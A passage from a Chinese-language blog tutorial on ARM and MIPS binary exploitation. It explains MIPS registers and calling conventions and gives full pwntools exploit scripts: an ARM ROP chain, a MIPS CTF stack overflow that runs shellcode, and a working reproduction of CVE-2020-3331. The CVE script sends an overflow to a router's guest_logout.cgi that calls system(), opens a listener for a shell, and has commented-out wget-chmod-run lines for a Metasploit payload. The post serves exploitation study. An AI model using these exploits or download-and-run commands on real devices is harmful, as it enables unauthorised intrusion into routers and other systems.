u64(io.recv(6).ljust(8,b<span class="hljs-string">&#x27;\x00&#x27;</span>))<br>lg = lambda data : io.success(<span class="hljs-string">&#x27;%s -&gt; 0x%x&#x27;</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>ru(<span class="hljs-string">&quot;Input ~ if you want to quit&quot;</span>)<br>s(b<span class="hljs-string">&#x27;\n&#x27;</span>)<br><br>sleep(0.5)<br>io.recv()<br><span class="hljs-comment">#payload=asm(shellcraft.sh()).ljust(112,b&#x27;A&#x27;)+p32(0xfffeef44)#shellcode</span><br><span class="hljs-attribute">pop_r0_r4_pc</span>=0x00020904<br><span class="hljs-attribute">bin_sh</span>=0x006C384<br><span class="hljs-attribute">svc_0</span>=0x00023b78<br><span class="hljs-attribute">pop_r7_pc</span>=0x00014068<br><span class="hljs-attribute">pop_r1_pc</span>=0x00068bec<br><span class="hljs-attribute">mov_r2_r4_blx_r3</span>=0x0003338c<br><span class="hljs-attribute">pop_r3_pc</span>=0x00008160<br><br><span class="hljs-attribute">payload</span>=b&#x27;A&#x27;*112+p32(pop_r7_pc)+p32(0xb)+p32(pop_r1_pc)+p32(0)+p32(pop_r0_r4_pc)+p32(bin_sh)+p32(0)+p32(pop_r3_pc)+p32(svc_0)+p32(mov_r2_r4_blx_r3)<br><span class="hljs-comment">#pause()</span><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure>

<h1 id="mips架构"><a href="#mips架构" class="headerlink" title="mips架构"></a>mips架构</h1><h2 id="基础知识-1"><a href="#基础知识-1" class="headerlink" title="基础知识"></a>基础知识</h2><h3 id="MIPS-重要特性"><a href="#MIPS-重要特性" class="headerlink" title="MIPS 重要特性"></a>MIPS 重要特性</h3><ul>
<li>mips本身不支持NX</li>
</ul>
<h3 id="MIPS-函数调用约定"><a href="#MIPS-函数调用约定" class="headerlink" title="MIPS 函数调用约定"></a>MIPS 函数调用约定</h3><ul>
<li>调用者将参数保存在寄存器 $a0 - $a3 中。其总共能保存4个参数。如果有更多的参数，或者有传值的结构，其将被保存在栈中。</li>
<li>调用者使用 jal 加上子程序的标记。返回地址保存在 $ra 中。</li>
<li>返回地址是 PC + 4，PC 是 jal 指令的地址。</li>
<li>如果被调用者使用框架指针，它通常将其设置为栈指针。旧的栈指针必须在之前被保存到栈中。</li>
<li>被调用者通常在开头将其需要使用的寄存器保存到栈中。如果被调用者调用了辅助子程序，必须将 $ra入栈，同时也必须将临时寄存器或被保留的寄存器入栈。</li>
<li>当子程序结束，返回值要保存在 $v0 - $v1 中。</li>
<li>被调用者使用 jr $ra 返回到调用者那里。</li>
</ul>
<p>Ref:<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/79895392ecb2">https://www.jianshu.com/p/79895392ecb2</a></p>
<h3 id="MIPS-寄存器"><a href="#MIPS-寄存器" class="headerlink" title="MIPS 寄存器"></a>MIPS 寄存器</h3><table>
<thead>
<tr>
<th>寄存器编号</th>
<th>别名</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>$0</td>
<td>$zero</td>
<td>常量0(constant value 0)</td>
</tr>
<tr>
<td>$1</td>
<td>$at</td>
<td>保留给汇编器(Reserved for assembler)</td>
</tr>
<tr>
<td>$2-$3</td>
<td>$v0-$v1</td>
<td>函数调用返回值(values for results and expression evaluation)</td>
</tr>
<tr>
<td>$4-$7</td>
<td>$a0-$a3</td>
<td>函数调用参数(arguments)</td>
</tr>
<tr>
<td>$8-$15</td>
<td>$t0-$t7</td>
<td>暂时的(或随便用的)</td>
</tr>
<tr>
<td>$16-$23</td>
<td>$s0-$s7</td>
<td>保存的(或如果用，需要SAVE&#x2F;RESTORE的)(saved)</td>
</tr>
<tr>
<td>$24-$25</td>
<td>$t8-$t9</td>
<td>暂时的(或随便用的)</td>
</tr>
<tr>
<td>$28</td>
<td>$gp</td>
<td>全局指针(Global Pointer)</td>
</tr>
<tr>
<td>$29</td>
<td>$sp</td>
<td>堆栈指针(Stack Pointer)</td>
</tr>
<tr>
<td>$30</td>
<td>$fp&#x2F;$s8</td>
<td>栈帧指针(Frame Pointer)</td>
</tr>
<tr>
<td>$31</td>
<td>$ra</td>
<td>返回地址(return address)</td>
</tr>
</tbody></table>
<p>基础知识:<a target="_blank" rel="noopener" href="https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#mips">https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#mips</a></p>
<h2 id="前期准备"><a href="#前期准备" class="headerlink" title="前期准备"></a>前期准备</h2><p>ida的mipsrop插件:<a target="_blank" rel="noopener" href="https://github.com/tacnetsol/ida">https://github.com/tacnetsol/ida</a></p>
<p>用ropper或者ROPgadget都不太好找gadget?</p>
<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><h3 id="HWS夏令营结营赛题-pwn"><a href="#HWS夏令营结营赛题-pwn" class="headerlink" title="HWS夏令营结营赛题:pwn"></a>HWS夏令营结营赛题:<a target="_blank" rel="noopener" href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_pwn_1/pwn">pwn</a></h3><p>运行：</p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript">qemu-mips-<span class="hljs-keyword">static</span> ./pwn<br></code></pre></td></tr></table></figure>

<p>调试:</p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript">qemu-mips-<span class="hljs-keyword">static</span> -g <span class="hljs-number">1234</span> ./pwn<br></code></pre></td></tr></table></figure>

<p>保护措施</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161756671.png" srcset="/img/loading.gif" lazyload alt="image-20240316175622583"></p>
<p>分析题目代码有个很明显的memcpy造成的栈溢出</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161757594.png" srcset="/img/loading.gif" lazyload alt="image-20240316175735552"></p>
<p>只是格式有点要求，直接调试不能直接获得偏移，会在下面这个地方卡住，具体原因就不太懂了</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161800428.png" srcset="/img/loading.gif" lazyload alt="image-20240316180028333"></p>
<p>只能通过去找输入的地址以及最后给到ra寄存器值的地址然后计算出偏移</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161803215.png" srcset="/img/loading.gif" lazyload alt="image-20240316180341152"></p>
<p>找到偏移之后就是利用mipsrop去找需要的gadget</p>
<p>思路大概是，找一个能将栈上的地址放进寄存器的gadget，再找一个对应的gadget可以jalr或者jr这个寄存器过去执行shellcode</p>
<figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs gherkin">Python&gt;mipsrop.stackfinder()<br>----------------------------------------------------------------------------------------------------------------<br>|<span class="hljs-string">  Address     </span>|<span class="hljs-string">  Action                                              </span>|<span class="hljs-string">  Control Jump                          </span>|<br>----------------------------------------------------------------------------------------------------------------<br>|<span class="hljs-string">  0x004273C4  </span>|<span class="hljs-string">  addiu $a2,$sp,0x70+var_C                            </span>|<span class="hljs-string">  jalr  $s0                             </span>|<br>|<span class="hljs-string">  0x0042BCD0  </span>|<span class="hljs-string">  addiu $a2,$sp,0x88+var_C                            </span>|<span class="hljs-string">  jalr  $s2                             </span>|<br>|<span class="hljs-string">  0x0042FA00  </span>|<span class="hljs-string">  addiu $v1,$sp,0x138+var_104                         </span>|<span class="hljs-string">  jalr  $s1                             </span>|<br>|<span class="hljs-string">  0x004491F8  </span>|<span class="hljs-string">  addiu $a2,$sp,0x44+var_C                            </span>|<span class="hljs-string">  jalr  $s1                             </span>|<br>|<span class="hljs-string">  0x0044931C  </span>|<span class="hljs-string">  addiu $v0,$sp,0x30+var_8                            </span>|<span class="hljs-string">  jalr  $s1                             </span>|<br>|<span class="hljs-string">  0x00449444  </span>|<span class="hljs-string">  addiu $a2,$sp,0x44+var_C                            </span>|<span class="hljs-string">  jalr  $s1                             </span>|<br>|<span class="hljs-string">  0x0044AD58  </span>|<span class="hljs-string">  addiu $a1,$sp,0x60+var_28                           </span>|<span class="hljs-string">  jalr  $s4                             </span>|<br>|<span class="hljs-string">  0x0044AEFC  </span>|<span class="hljs-string">  addiu $a1,$sp,0x64+var_28                           </span>|<span class="hljs-string">  jalr  $s5                             </span>|<br>|<span class="hljs-string">  0x0044B154  </span>|<span class="hljs-string">  addiu $a1,$sp,0x6C+var_38                           </span>|<span class="hljs-string">  jalr  $s2                             </span>|<br>|<span class="hljs-string">  0x0044B1EC  </span>|<span class="hljs-string">  addiu $v0,$sp,0x6C+var_40                           </span>|<span class="hljs-string">  jalr  $s2                             </span>|<br>|<span class="hljs-string">  0x0044B3EC  </span>|<span class="hljs-string">  addiu $v0,$sp,0x170+var_130                         </span>|<span class="hljs-string">  jalr  $s0                             </span>|<br>|<span class="hljs-string">  0x00454E94  </span>|<span class="hljs-string">  addiu $s7,$sp,0xB8+var_98                           </span>|<span class="hljs-string">  jalr  $s3                             </span>|<br>|<span class="hljs-string">  0x00465BEC  </span>|<span class="hljs-string">  addiu $a1,$sp,0xC4+var_98                           </span>|<span class="hljs-string">  jalr  $s0                             </span>|<br>----------------------------------------------------------------------------------------------------------------<br></code></pre></td></tr></table></figure>

<p>首先找到这个0x004273C4这个gadget，可以将栈地址给到a2寄存器，然后去找能够jalr或者jr a2的gadget</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-section">Python&gt;mipsrop.find(&quot;jr&quot;)</span><br><span class="hljs-section">----------------------------------------------------------------------------------------------------------------</span><br><span class="hljs-section">|  Address     |  Action                                              |  Control Jump                          |</span><br><span class="hljs-section">----------------------------------------------------------------------------------------------------------------</span><br>|  0x004002FC  |  jr $ra                                              |  jr    0x1C+var_s0($sp)                |<br>|  0x0041F518  |  jr $t9                                              |  jr    $s1                             |<br>|  0x0041F538  |  jr $t9                                              |  jr    $s1                             |<br>|  0x00421684  |  jr $t9                                              |  jr    $a2                             |<br><br><span class="hljs-title">.text:00421684 00 C0 C8 25                   move    $t9, $a2</span><br><span class="hljs-title">.text:00421688 03 20 00 08                   jr      $t9</span><br></code></pre></td></tr></table></figure>

<p>很明显可以利用0x00421684这段gadget</p>
<p>然后就是想办法怎么执行第一段gadget1后接着执行gadget2，先看看这两端gadget</p>
<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arcade"><span class="hljs-number">0x004273C4</span>  |  addiu <span class="hljs-symbol">$a</span>2,<span class="hljs-symbol">$sp</span>,<span class="hljs-number">0x70</span>+var_C                            |  jalr  <span class="hljs-symbol">$s</span>0 <br><span class="hljs-number">0x00421684</span>  |  jr <span class="hljs-symbol">$t</span>9                                              |  jr    <span class="hljs-symbol">$a</span>2  <br><br></code></pre></td></tr></table></figure>

<p>可以看到第一段gadget最后会jalr到$s0这个寄存器，而在pwn函数的最后刚好可以控制这个寄存器</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161809594.png" srcset="/img/loading.gif" lazyload alt="image-20240316180902557"></p>
<p>经过调试确定偏移为0x6c,然后就是在程序最后sp+0x64的地方写上shellcode就可以getshell了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><span class="hljs-comment">#banary = &quot;./pwn&quot;</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF(&quot;./libc.so.6&quot;)</span><br><span class="hljs-comment">#libc=ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)</span><br>ip = <span class="hljs-string">&#x27;&#x27;</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br>    io = process([<span class="hljs-string">&quot;qemu-mips-static&quot;</span>,<span class="hljs-string">&quot;-L&quot;</span>,<span class="hljs-string">&quot;/usr/mipsel-linux-gnu/&quot;</span>,<span class="hljs-string">&quot;./pwn&quot;</span>])<br><span class="hljs-keyword">else</span>:<br>    io = process([<span class="hljs-string">&quot;qemu-mips-static&quot;</span>,<span class="hljs-string">&quot;-L&quot;</span>,<span class="hljs-string">&quot;/usr/mipsel-linux-gnu/&quot;</span>,<span class="hljs-string">&quot;-g&quot;</span>,<span class="hljs-string">&quot;1234&quot;</span>,<span class="hljs-string">&quot;./pwn&quot;</span>])<br><br>context(log_level = <span class="hljs-string">&#x27;debug&#x27;</span>, os = <span class="hljs-string">&#x27;linux&#x27;</span>, arch = <span class="hljs-string">&#x27;mips&#x27;</span>,endian=<span class="hljs-string">&quot;big&quot;</span>)<br><span class="hljs-comment">#context(log_level = &#x27;debug&#x27;, os = &#x27;linux&#x27;, arch = &#x27;i386&#x27;)</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br>    gdb.attach(io)<br>    pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b&quot;\xff&quot;</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b&quot;\x7f&quot;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&quot;\x00&quot;</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">&#x27;%s -&gt; 0x%x&#x27;</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">&quot;Enter the group number:&quot;</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br><br>jr_a2=<span class="hljs-number">0x0421684</span><br>addiu_a2=<span class="hljs-number">0x4273c4</span> <span class="hljs-comment">#addiu $a2,$sp,0x70+var_C jalr  $s0</span><br><br>ru(<span class="hljs-string">&quot;&#x27;1:Job.&#x27;&quot;</span>)<br>payload=<span class="hljs-string">b&#x27;1:&#x27;</span><br>payload += <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x6c</span> + p32(jr_a2) + <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x20</span> + p32(addiu_a2)<br>payload += <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x64</span> + asm(shellcraft.sh())<br><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure>

<h3 id="CVE-2020-3331复现"><a href="#CVE-2020-3331复现" class="headerlink" title="CVE-2020-3331复现"></a>CVE-2020-3331复现</h3><p>参考:<a target="_blank" rel="noopener" href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_iot_cc/pwn.md">https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_iot_cc/pwn.md</a></p>
<p>上面链接有固件下载链接还有复现环境，但是不推荐使用他里面的复现环境(docker)，因为版本太老的原因，会出现很多问题，不如直接自己使用qemu模拟环境</p>
<p>漏洞出现的位置:guest_logout_cgi函数当中对于sscanf对于submit_button参数的处理</p>
<p><strong>sscanf</strong> 与我们熟悉的 <strong>scanf</strong> 非常类似，二者的区别在于：在调用 <strong>sscanf</strong> 时，需要将带解析的字符串作为第一个参数传入；而在调用 <strong>scanf</strong> 时，待解析的参数则是来自标准输入。为了更好地理解 <strong>sscanf</strong> 的功能，不妨先来看一个例子：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> &#123;<br>    <span class="hljs-type">int</span> a, b, c;<br>    <span class="hljs-type">char</span> <span class="hljs-built_in">string</span>[<span class="hljs-number">15</span>] = <span class="hljs-string">&quot;1 2 3&quot;</span>;<br>    <span class="hljs-built_in">sscanf</span>(<span class="hljs-built_in">string</span>, <span class="hljs-string">&quot;%d %d %d&quot;</span>, &amp;a, &amp;b, &amp;c);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%d %d %d\n&quot;</span>, a, b, c);<br>    system(<span class="hljs-string">&quot;pause&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>在本例中， <strong>sscanf</strong> 利用格式化字符串 <strong>“%d %d %d”</strong> 将 <strong>string</strong> 中的1、2、3分别赋值给了变量 <strong>a</strong> 、 <strong>b</strong> 和 <strong>c</strong> 。</p>
<p><strong>sscanf</strong> 利用格式化字符串 <strong>“%[^;];%*[^&#x3D;]&#x3D;%[^\n]”</strong> 将 <strong>v11</strong> 分成了6个部分，其中 <strong>sub_string1</strong> 是一个不含 <strong>‘;’</strong> 的字符串（对应 <strong>%[^;]</strong> ），其值将被赋给 <strong>v29</strong>; <strong>sub_string2</strong> 是一个不含 <strong>‘&#x3D;’</strong> 的字符串（对应 <strong>%*[^&#x3D;]</strong> ，此处 ***** 起到舍弃该值的作用），其值将被丢弃； <strong>sub_string3</strong> 是一个不含 <strong>‘\n’</strong> 的字符串（对应 <strong>%[^\n]</strong> ），其值将被赋给 <strong>v28</strong>。例如，若 <strong>v11 &#x3D; “AAAA;var&#x3D;BBBB\n”</strong> ，则 <strong>v29 &#x3D; “AAAA”</strong> 、 <strong>v28 &#x3D; “BBBB”</strong> 。</p>
<p>而触发漏洞需要满足下面三个条件:</p>
<ol>
<li><strong>v5</strong> !&#x3D; NULL &amp;&amp; <strong>v10</strong> !&#x3D; NULL</li>
<li><strong>v5</strong> 是一个合法的MAC地址 &amp;&amp; <strong>v10</strong> 是一个合法的IPv4地址</li>
<li><strong>v11</strong> 中需要包含子串 <strong>“status_guestnet.asp”</strong> 。</li>
</ol>
<p>v5&#x3D;get_cgi(“cmac”);</p>
<p>v10 &#x3D; get_cgi(“cip”);</p>
<p>v11 &#x3D; get_cgi(“submit_button”);</p>
<p>然后就可以想办法构造payload了，这个固件比较凑巧在函数最后返回的时候，a0刚好是前面sscanf的第一个参数，也就是在程序最后溢出控制返回地址为system时的第一个参数刚好就是我们前面的输入值</p>
<p>exp:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-comment">#!/usr/bin/python3</span><br><br><span class="hljs-keyword">from</span> pwn import *<br>import requests<br><span class="hljs-keyword">from</span> threading import Thread<br><br>context(<span class="hljs-attribute">arch</span>=<span class="hljs-string">&#x27;mips&#x27;</span>, <span class="hljs-attribute">endian</span>=<span class="hljs-string">&#x27;little&#x27;</span>, <span class="hljs-attribute">os</span>=<span class="hljs-string">&#x27;linux&#x27;</span>)<br><span class="hljs-built_in"></span><br><span class="hljs-built_in">system </span>= 0x0047A610<br><br>cmd  = <span class="hljs-string">&#x27;\n&#x27;</span><br><span class="hljs-comment">#cmd += &#x27;wget http://192.168.2.1:8000/tools/msf -O /msf\n&#x27;</span><br><span class="hljs-comment">#cmd += &#x27;chmod 777 /msf\n&#x27;</span><br><span class="hljs-comment">#cmd += &#x27;/msf\n&#x27;</span><br>cmd += <span class="hljs-string">&#x27;echo &quot;pwn_sucess&quot; &gt; /tmp/test.txt\n&#x27;</span><br><br>assert(len(cmd) &lt; 0x55)<br><br>payload = b<span class="hljs-string">&quot;status_guestnet.asp&quot;</span> + cmd.ljust(0x55,<span class="hljs-string">&#x27;b&#x27;</span>).encode() + p32(system) <br><span class="hljs-comment">#payload=b&quot;status_guestnet.asp&quot; + b&#x27;aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab&#x27;</span><br>data = &#123;<span class="hljs-string">&quot;cmac&quot;</span>:<span class="hljs-string">&quot;12:af:aa:bb:cc:dd&quot;</span>, <span class="hljs-string">&quot;submit_button&quot;</span>:payload, <span class="hljs-string">&quot;cip&quot;</span>:<span class="hljs-string">&quot;192.168.100.1&quot;</span>&#125;<br><br>def attack():<br>    try:<br>        requests.post(<span class="hljs-string">&quot;http://192.168.182.21/guest_logout.cgi&quot;</span>, <span class="hljs-attribute">data</span>=data, <span class="hljs-attribute">timeout</span>=1)<br>    except Exception as e:<br>        <span class="hljs-built_in">print</span>(e)<br><br>thread = Thread(<span class="hljs-attribute">target</span>=attack)<br>thread.start()<br><br>io = listen(31337)<br>io.wait_for_connection()<br>log.success(<span class="hljs-string">&quot;getshell&quot;</span>)<br>io.interactive()<br><br>thread.join()<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>异构学习</div>
      <div>http://blogyoulin.top/2024/03/15/异构学习/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>March 15, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/22/vivotek%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="vivotek摄像头栈溢出漏洞复现">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">vivotek摄像头栈溢出漏洞复现</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/15/house-of-orange/" title="house_of_orange">
                        <span class="hidden-mobile">house_of_orange</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
